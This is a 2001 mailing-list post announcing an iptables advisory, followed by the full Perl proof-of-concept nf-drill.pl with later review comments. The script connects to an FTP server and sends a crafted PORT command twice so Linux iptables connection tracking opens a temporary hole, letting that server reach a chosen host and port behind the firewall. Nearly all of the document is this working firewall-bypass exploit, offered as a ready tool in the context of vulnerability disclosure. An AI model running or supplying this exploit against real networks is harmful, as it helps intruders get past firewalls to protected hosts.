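Hi, The advisory on this should be going on Bugtraq, for whoever is interested -- this is a little tool that I wrote for it, since this is pen-test :) Curious thing is I actually discovered this in a pen-test. Cristiano Lincoln Mattos, CISSP, SSCP CESAR - Centro de Estudos e Sistemas Avançados do Recife
#!/usr/bin/perl
#
# nf-drill.pl --- "Drill" holes open in Linux iptables connection table
# Author: Cristiano Lincoln Mattos <lincolnat_private>, 2001
#
# Advisory: http://www.tempest.com.br/advisories/linux-iptables
#
# Tempest Security Technologies - a business unit of:
# CESAR - Centro de Estudos e Sistemas Avancados do Recife
#
# This code is licensed under the GPL.
#
# What the script does: it acts as a plain FTP client, connects to
# <server>:<serverport>, reads the greeting and then sends the same
# "PORT h1,h2,h3,h4,p1,p2" line twice, naming <host>:<port>.  It prints
# every line exchanged when --verbose is given.  See the advisory above
# for the connection-tracking behaviour this exercises.
#
# Review notes against the original posting:
#   - 'use warnings' added.  The option checks compared undef with 'eq',
#     which warns; they now test definedness explicitly.
#   - Bareword filehandle 'Sock' replaced with a lexical handle, and the
#     results of socket()/send()/recv()/close() are checked instead of
#     being ignored.
#   - --serverport is now an integer option (was =s).
#   - --host is resolved with inet_aton(), the same call already used for
#     --server; it used to be split on '.' with no validation, so a
#     malformed value produced a garbage PORT line.
#   - Failures exit with status 1 instead of 0.
#
use strict;
use warnings;
use Socket;
use Getopt::Long;

# Option variables
my $server;
my $serverport = 21;
my $host;
my $port;
my $verbose = 0;

# Bytes read per recv().  The original read 120 bytes and only ever
# looked at the first chunk, so a long multi-line banner may be truncated
# in the verbose output; behaviour is kept as-is.
my $REPLY_LEN = 120;

# Print function.
#   $level 0 -- always printed (errors and progress)
#   $level 1 -- printed only when --verbose is set
sub out {
    my ($level, $text) = @_;
    if (!$level || $verbose) {
        print $text;
    }
    return;
}

# Print an error the same way the rest of the script does (level 0, on
# STDOUT) and exit non-zero.
sub fail {
    my ($text) = @_;
    out(0, $text);
    exit(1);
}

# Read one reply chunk from the FTP server, echo it in verbose mode and
# return it with the trailing newline removed.  recv() returning undef
# (an error) is fatal; an empty chunk (peer closed) is passed through.
sub read_reply {
    my ($sock) = @_;
    my $buf = '';
    defined recv($sock, $buf, $REPLY_LEN, 0)
        or fail(" Error: recv from $server:$serverport failed: $!\n");
    chomp($buf);
    out(1, " - RECV: $buf\n");
    return $buf;
}

# Send one command line (already CRLF-terminated) and read the reply.
sub send_cmd {
    my ($sock, $cmd) = @_;
    defined send($sock, $cmd, 0)
        or fail(" Error: send to $server:$serverport failed: $!\n");
    out(1, " - SEND: $cmd");
    return read_reply($sock);
}

my $opt_ok = GetOptions(
    "server=s"     => \$server,
    "serverport=i" => \$serverport,
    "host=s"       => \$host,
    "port=i"       => \$port,
    "verbose"      => \$verbose,
);

# Absent options are undef, not "", so test definedness first.  Port 0 is
# accepted, as in the original.
if (   !$opt_ok
    || !defined $server || $server eq ""
    || !defined $host   || $host eq ""
    || !defined $port   || $port < 0 || $port > 65535)
{
    print "Usage: $0 --server <ftp> [--serverport <port>] --host <target> --port <port> [--verbose]\n";
    print " - server: specifies the FTP server (IP or hostname) to connect to\n";
    print " - serverport: specifies the port of the FTP server -- default: 21\n";
    print " - host: the IP of the target to open in the connection table\n";
    print " - port: the port of the target to open in the connection table\n";
    print " - verbose: sets verbose mode\n";
    exit(1);
}

# NOTE(review): the banner names nf-blast.pl while the header says
# nf-drill.pl; left as posted.
print "\n nf-blast.pl -- Cristiano Lincoln Mattos <lincoln\@cesar.org.br>, 2001\n";
print " Tempest Security Technologies\n\n";

# Resolve the target.  A dotted quad works as before; a hostname is now
# accepted too.  PORT takes the four address bytes and the port split
# into high and low byte.
my $hostn = inet_aton($host)
    or fail(" Error: could not convert $host\n");
my @ip  = unpack('C4', $hostn);
my $str = sprintf("PORT %d,%d,%d,%d,%d,%d\r\n", @ip, $port >> 8, $port % 256);

# Socket init
my $ipn = inet_aton($server)
    or fail(" Error: could not convert $server\n");
my $sin = sockaddr_in($serverport, $ipn);

socket(my $sock, PF_INET, SOCK_STREAM, IPPROTO_TCP)
    or fail(" Error: could not create socket: $!\n");
connect($sock, $sin)
    or fail(" Error: could not connect to $server:$serverport.\n");
out(0, " - Connected to $server:$serverport\n");

# Greeting banner.
read_reply($sock);

# First send a dummy one, just to establish the connection in the iptables logic
send_cmd($sock, $str);

# Now, send the one that will insert itself into the connection table
send_cmd($sock, $str);

out(0, " * $server should now be able to connect to $host on port $port ! (for the next 10 seconds)\n");
out(0, " - Closing connection to $server:$serverport.\n\n");
close($sock)
    or fail(" Error: close failed: $!\n");
exit(0);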